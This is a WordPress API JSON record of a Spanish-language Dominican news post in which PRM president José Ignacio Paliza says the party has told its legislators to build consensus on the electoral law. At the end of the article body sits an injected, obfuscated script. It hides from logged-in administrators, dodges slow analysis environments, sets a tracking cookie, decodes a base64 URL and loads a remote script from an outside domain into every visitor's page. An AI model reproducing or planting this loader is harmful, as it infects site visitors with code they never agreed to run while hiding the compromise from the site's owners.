{"id":13187,"date":"2023-01-09T14:16:50","date_gmt":"2023-01-09T18:16:50","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13187"},"modified":"2023-01-09T14:16:50","modified_gmt":"2023-01-09T18:16:50","slug":"prm-instruye-a-sus-legisladores-a-construir-consenso-para-la-aprobacion-de-la-ley-electoral","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13187","title":{"rendered":"PRM instruye a sus legisladores a construir consenso para la aprobaci\u00f3n de la ley Electoral"},"content":{"rendered":"<p>Jos\u00e9 Ignacio Paliza, presidente de la organizaci\u00f3n dice se requiere la aprobaci\u00f3n de las necesarias reformas previo al proceso electoral venidero.<\/p>\n<p>El presidente del Partido Revolucionario Moderno (PRM), Jos\u00e9 Ignacio, asegur\u00f3 hoy que esa organizaci\u00f3n pol\u00edtica aboga por la aprobaci\u00f3n de la ley electoral.<\/p>\n<p>En ese sentido, el tambi\u00e9n ministro administrativo de la Presidencia, dijo que se ha dado instrucciones a la bancada del PRM en la C\u00e1mara de Diputados, para que se alcance el mayor consenso posible.<\/p>\n<p>\u201cHemos instruido a nuestras bancas, tanto en el Senado como en la C\u00e1mara de Diputados, pero sobretodo en la C\u00e1mara de Diputados donde reposa la pieza, para que se pueda construir el mayor consenso posible con la Junta Central Electoral y todos los partidos del sistema en relaci\u00f3n a esta ley\u201d, puntualiz\u00f3 Paliza.<\/p>\n<p>El presidente del PRM dijo que la ley electoral es una pieza muy importante, que nos regula a todos y que por tanto debe construirse con el mayor consenso posible.<\/p>\n<p>\u201cAhora bien, el PRM quiere ley, entendemos que necesitamos hacer las mejoras correspondientes y tenemos que impulsarla con el mayor grado de oportunidad para que esa ley pueda aprobarse antes del proceso electoral y que regule el mismo\u201d, puntualiz\u00f3 el presidente del PRM.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Jos\u00e9 Ignacio Paliza, presidente de la organizaci\u00f3n dice se requiere la aprobaci\u00f3n de las necesarias reformas previo al proceso electoral venidero. El presidente del Partido Revolucionario Moderno (PRM), Jos\u00e9 Ignacio, asegur\u00f3 hoy que esa organizaci\u00f3n pol\u00edtica aboga por la aprobaci\u00f3n de la ley electoral. En ese sentido, el tambi\u00e9n ministro administrativo de la Presidencia, dijo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13189,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13187","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13187"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13187\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13189"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}